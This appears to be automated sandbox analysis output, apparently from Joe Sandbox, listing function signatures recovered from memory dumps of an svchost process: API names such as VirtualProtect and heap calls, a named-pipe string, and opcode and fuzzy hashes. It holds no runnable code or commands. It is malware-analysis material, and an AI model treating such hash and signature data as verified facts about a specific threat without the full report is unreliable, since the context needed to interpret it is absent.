                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction ID: 937dd187684a93fc4a0a371c5cfb18e82c1c9fc7c5b71045479657b2503f7690
                                                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction Fuzzy Hash: 8A61AA36719B82C6F7609F96E45935AB7A0F388B54F100116FA8D87BA4DB7CC961CF10
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: 1b6738982dcf0e617715fd65e884e0b150f2850f27dc5679eb4338a4a623ffbf
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 91117032B58A1341F6B811EBE45F7EDE0416B66374F484724EA76063DA8B988C627230
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
                                                                                • Instruction ID: aef2d3e1cf869e959b1c88e08fe3342268ed212d724d5eaba1cfb1930dbafce0
                                                                                • Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
                                                                                • Instruction Fuzzy Hash: 9811213071175786FE649FA7E84E7E9B2A167887A0F144624D926077E5DF2CC8728630
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
                                                                                • Instruction ID: 74c0414a35b5a3f53ab2054dbc6437830451d03d99355e2cee5e6eeca0a9b90b
                                                                                • Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
                                                                                • Instruction Fuzzy Hash: 20113321713643C2FED49BB7A84C7F5A292E786BA0F154724D926077D5DF2CC862C700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 1092925422-0
                                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction ID: 57ca71e22fa5b3ed83cc1bf47a705c019001b811a1058a7761075c86e86717fb
                                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction Fuzzy Hash: B311182A704B5286FBA49F93E4093E9A6A0FB48B84F040029DE8947B94EF3DC5188710
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 1092925422-0
                                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction ID: 9739da4be943f2dc8e92f1252a47373430bb86a515c1afab9827f44ca7d1f82e
                                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction Fuzzy Hash: 65111E2A705B43C2FB949B92F4187BAA6B4F74AB84F044029DE8947794EF3DC555C704
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction ID: 61586a0ae3d9af336a7feb3244d58183b5b2c7967cb7b94cd89bd2c1bdd5a7c6
                                                                                • Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction Fuzzy Hash: 3E112E72614B8A9AF764AFA7E84929EB371F789B84F044029DB8A03754DF3CC461C750
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction ID: b8c861478b1f25366fd74288f1d51551b38ed3c61af69358ef0e1c5a1f5b0404
                                                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction Fuzzy Hash: D7719C32310BC386FB649EA7D95A7EAF690F784BC4F444216DE4947B89DF36C6248B10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction ID: 20237c5c54a3f8eb10ff098e720b8d591b180cfe9ccf8979255d570dc9b993f9
                                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction Fuzzy Hash: 2551F9323047C342F6749EABD55E7EEE651F385780F014225DD8A43B9ACF7AC4218B60
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction ID: 60c1c28be9136a5e28ed507775e51aa3993954b3d1a94bd617eaebac4fcea883
                                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction Fuzzy Hash: 3D51C732226B83C2F6B49EAB955C3FEE791F386780F404027DD8903B9ADB35D4618B40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction ID: bdb08726b3ef75628cdaab26a9841a66a8a6064bf0ac9d8b050c925bfa4f7aa7
                                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction Fuzzy Hash: 6341B572314A8281FB609F67E4493DEB7A0F388784F404125EE8E87798DB3CC561CB50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction ID: d068bae5036d0eee0de407b254fed1348c06666d9d9557c42f5e96979ee8fe78
                                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction Fuzzy Hash: 1741B572315A82C1FBA09F66E8483EAB7E0F389B84F515125EE4E87798DB3CC551CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Stringtry_get_function
                                                                                • String ID: LCMapStringEx
                                                                                • API String ID: 2588686239-3893581201
                                                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction ID: 14c1072200d825e8a7b497d491b17a69046bfdff55b13357bba79c5b080fc5ed
                                                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction Fuzzy Hash: 7B113636308B8286E760DF96F4852DAB7A1F7C8B80F544126EE8D83B59DF38C4608B00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction ID: c86aaabd615968a03a70381e6e1a9290a19be8821cea87d1ba15289ae3364de5
                                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction Fuzzy Hash: 61111C32218B8682EB658F56E545299B7A5F788B98F184221DF8D07B68DF3CC565CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction ID: 0abadc274f8d33753a0593f38f9897fc56eb46907de91766e49cb8776aacca17
                                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction Fuzzy Hash: 7E115432205B8282EB608F26F4443A9B7E0F785B94F594215DF8D07B64DF3CC561C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                • String ID: InitializeCriticalSectionEx
                                                                                • API String ID: 539475747-3084827643
                                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction ID: 6353e87e86811192389de0db5ea8fcbd5ca86f3ce0c0180d504e43c7d201f6fe
                                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction Fuzzy Hash: 4BF08235314B8391FB25AFC3F44A6E9A321EB88B90F585025A95907B99CF3CC9B5C720
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                • String ID: InitializeCriticalSectionEx
                                                                                • API String ID: 539475747-3084827643
                                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction ID: cbb313881e4084d0fe17f811ea22f92c282591ecfa3051e383f9e4480f49f238
                                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction Fuzzy Hash: C1F08222311783D2FB859BD3F4486F6A3A1BB89B90F485025AA5903F54CF38C9B5C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Valuetry_get_function
                                                                                • String ID: FlsSetValue
                                                                                • API String ID: 738293619-3750699315
                                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction ID: 5b8879814929d07e1a9a0cd258878afb26e6db0b23220b647961840e44a93d10
                                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction Fuzzy Hash: A7E0E57131064391FA555BD7F84E7E9E322ABC8780F585125D91906395CF3CC975C730
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Valuetry_get_function
                                                                                • String ID: FlsSetValue
                                                                                • API String ID: 738293619-3750699315
                                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction ID: 7bb1fa0e0d4c1e4a0d99fc1eb935b2830280e6d068342c5d905c6e6c0c120f29
                                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction Fuzzy Hash: 52E06D62241643D2FB844BE2F8087F6A2A2BB89B80F489022D91907755DF38C975C700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction ID: 67bf8005ee8a488def86704bb943a8d4b0a88b2be6388ac4e92eca18720aecea
                                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction Fuzzy Hash: 2F218132704B8286FB619F9BE4092DAF3A1FB88B94F154115EE8C47B64EF7CC5628710
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction ID: 05704a076337ef02e917c48f5760be316bd823fb472f9ee5522c7c2deedd7627
                                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction Fuzzy Hash: BD216226605B92C6FB918F9BE4082AAF3E0FB89B94F154115DE8D47B24FF78C5668700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction ID: d76168678a2fc502f315b1b9b6f3c75eb188acf8bf3d020b4ec9175e5f6efc07
                                                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction Fuzzy Hash: 0DE039B17116028AF754ABA3D8093C9B6E1EB89B01F488024C90907390DF7D84A9C7A0